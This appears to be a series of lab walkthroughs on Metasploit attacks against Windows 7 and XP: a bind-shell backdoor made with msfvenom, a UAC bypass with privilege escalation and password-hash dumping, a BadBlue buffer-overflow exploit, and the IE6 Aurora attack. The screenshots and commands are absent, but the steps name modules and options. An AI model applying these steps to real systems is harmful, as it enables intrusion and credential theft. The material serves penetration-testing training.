METASPLOIT - Windows 7 - Bind TCP Shell

WINDOWS 7 - BIND TCP SHELL

- Layout for this exercise:

- msfvenom converts Metasploit payloads into executable or binary files. In this case, the 
windows/meterpreter/bind_tcp payload is converted into a Microsoft executable file (.exe) with these options:

-a x86 = architecture x86
-f exe = format executable

- The command file checks that bind_tcp.exe is of PE32 type. PE (Portable Executable) is a file format for executables, object code, DLLs, Font files, and others used in 32 and 64 bits versions of Windows operating systems. 

- From the Kali attacker side, a SimpleHTTPServer is run, accepting connections on port 8000:

- The victim Windows 7 connects to the attacker's web server and downloads bind_tcp.exe:

- The client or victim Windows 7 has downloaded bind_tcp.exe, a backdoor that in case of being executed will trigger an undesired Internet connection between attacker and victim.

- The attacker detects that bind_tcp.exe has been downloaded on the client side, from IP 192.168.1.14:

- Then, the attacker sets up a handler exploit with the payload meterpreter, waiting until the victim runs the executable. The RHOST is the IP 192.168.1.14, corresponding to the victim: 

- On the client side, the victim executes bind_tcp.exe:





- Now, Windows 7 is running bind_tcp.exe:





- As a consequence, on the attacker side a meterpreter session is automatically created by the handler:

- Running netstat on both Windows 7 and Kali shows how a connection has been established between the victim and the attacker:

- However, the bind_tcp.exe executable would be stopped in case of presence of firewall. Let's see what happens if Windows Firewall is "on":

- If the victim runs bind_tcp.exe Windows Firewall immediately detects and blocks its execution:

- Only if the victim clicked Allow access option (which would be unwise) , the executable would be run.

-  The conclusion is that Bind Shell payloads don't work with firewalls, because these programs or devices are usually configured to detect INBOUND connections. The solution would be to use OUTBOUND connections, like those provided by Reverse Shell payloads.

METASPLOIT - Windows 7 - Bypassing User Account Control

WINDOWS 7 - BYPASSING USER ACCOUNT CONTROL

- Layout for this exercise:




- Let's suppose we have a Windows 7 system already exploited:




- From Control Panel -> User Accounts and Family Safety -> User Accounts -> Change User Account Control Settings:




- In this case Windows 7 has got the User Account Control (UAC) set to Default level:








- Let's exploit the system with badblue_passthru:




- However, it is not possible to get total control over the system, due to the presence of the UAC:

- Post explotaition cannot be performed:




- To perform good exploitation of UAC, it is recommendable to use processes as much stable as possible. For instance, the current process is badblue.exe:










- It would be a good idea to migrate to a more stable process like explorer.exe:







- To start the process of bypassing UAC, in order to get total control over the victim, the current meterpreter session is put into background mode:

- At the moment, there is only 1 meterpreter session active:

- There is a good exploit to bypass the User Account Control:





- For this exploit, the active meterpreter session is a required option:

- So, session is set to 1:




- Also, reverse_tcp payload is used, with local host the attacker's IP:




- The exploit is launched, and a second meterpreter session is achieved as a result:




- Now, from this second meterpreter session Privilege Escalation is done with no problem. Getting control over the system with authority credentials:





- A good example of post exploitation is the command hashdump, which provides hashes of the passwords:

- Also, smart_hashdump dumps hashes on a file text, for further treatment for instance with John the Ripper:

METASPLOIT - Windows 7 - Exploitation

WINDOWS 7 - EXPLOITATION

- Layout for this exercise:





- Bad Blue es is File Sharing web service application available for Windows systems that allows users to share files.  

http://www.badblue.com/down.htm


- However, this application suffers from a vulnerability that can be exploited with a stack buffer overflow, affecting the PassThru functionality in ext.dll, for versions 2.72b and earlier:

https://www.exploit-db.com/exploits/16806/


- Once BadBlue downloaded, installed and accepted the License agreement, finally it is working on Windows 7, running on port TCP 80:





- The attacker detects that Bad Blue web server is running on victim's port 80:



















- Searching exploits for BadBlue into the Metasploit Framework:

- Let's try this exploit:






- Options for this exploit are simple:






















- The remote host is set to the victim's IP:





- The exploitation is successful:

METASPLOIT - Windows XP - Aurora - Internet Explorer 6

WINDOWS XP - AURORA - INTERNET EXPLORER 6

- Layout for this exercise:




 
- Internet Explorer 6 suffers from a memory corruption flaw that can be exploited. This a client side attack, where the victim connects to a web server with the Internet Explorer 6 brower. Internet Explorer 6 holds a memory corruption flaw that can be exploited from a fake web server. This attack can be performed against old operating systems like Windows XP with no updated browsers. 

- Metasploit provides the module ms10_002_aurora to take advantage of this vulnerability:

  


- Required options for this exploit:




- The SRVPORT can be the usual TCP 80:




- The SRVHOST corresponds to the local host or web server's IP: 







- The URIPATH is the URL where the victim clicks for triggering the exploit. In this case, let's establish /:

- The exploit is run and the web server starts on the attacker side, waiting for a client to connect:

- From the client side, the victim XP connects to the web server:





- Then, a meterpreter session (1) is opened:









- Interacting with session 1, post exploitation can be done over the victim XP: